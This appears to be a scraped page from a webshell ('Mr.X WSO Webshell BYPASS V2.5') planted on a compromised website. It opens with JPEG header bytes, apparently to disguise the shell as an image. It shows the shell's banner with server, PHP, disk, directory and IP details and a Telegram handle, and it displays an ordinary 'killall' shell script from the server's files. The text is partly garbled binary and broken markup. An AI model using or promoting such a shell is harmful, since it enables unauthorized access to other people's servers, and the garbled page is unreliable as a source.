����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 21:06:23 1999.30 GB Free: 67.00 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
#! /bin/sh # $Id: killall,v 1.3 2012/06/29 09:39:19 tom Exp $ # Linux has a program that does this correctly. . ./setup-vars for prog in $* do pid=`ps -a |fgrep $prog |fgrep -v fgrep|sed -e 's/^[ ]*//' -e 's/ .*//' ` if test -n "$pid" ; then echo killing pid=$pid, $prog kill -$SIG_HUP $pid || \ kill -$SIG_TERM $pid || \ kill -$SIG_KILL $pid fi done